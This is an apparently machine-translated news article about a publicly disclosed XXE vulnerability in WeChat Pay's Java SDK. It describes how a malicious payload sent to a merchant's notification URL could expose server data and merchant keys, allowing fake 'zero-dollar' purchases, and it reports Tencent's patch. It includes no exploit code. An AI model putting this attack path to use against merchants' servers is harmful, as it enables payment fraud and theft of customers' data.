You can buy it for $0, and WeChat pays the official SDK for a serious leak

With the promotion and popularization of smart phones, mobile payment has become one of the main payment methods for people’s daily shopping.

In the rapid development of third-party mobile payment, it presents the characteristics of diversification, accelerates the industry innovation, creates the enterprise marketing of red envelope, and strengthens the social nature of mobile payment.

In the process of accelerating the development of socialization of cashless payments, various payment institutions need to increase investment in payment security.

Recently, some netizens have published a serious vulnerability in the WeChat payment official SDK (software tool development kit) in a security community. This vulnerability can lead to the intrusion of the merchant server once the attacker obtains the key security key of the merchant (md5-key and merchant -Id), he can deceive the merchant by sending fake information without paying for anything.

When using WeChat payment, merchants need to provide a notification URL to accept asynchronous payment results.

The problem is that there is a xxe vulnerability in the implementation of WeChat in the JAVA version of the SDK. An attacker can build a malicious payload to the notification URL and steal any information from the merchant server as needed.

In other words, a hacker who exploits WeChat’s payment vulnerability can buy for 0 dollars.

For using WeChat pay for ordinary users, the most direct impact is that you are in business background of user information has been exposed, and hackers to these information can be dark to sell online. Then you become a victim of spam.

And for hackers, through this loophole, it’s not only a $0 buy, but it can be made by selling users information.

It is important to note that the detailed information and the vulnerability of the attacks have been publicly, security personnel suggest using JAVA language SDK (software development kit) to develop micro letter payment function of merchants, a quick check and repair.

In response, Tencent said in response, “WeChat payment technology security team has been paying attention to and troubleshooting for the first time, and updated the SDK vulnerability on the official website to fix known security vulnerabilities, and remind merchants to update in time. Please feel free to use WeChat payment.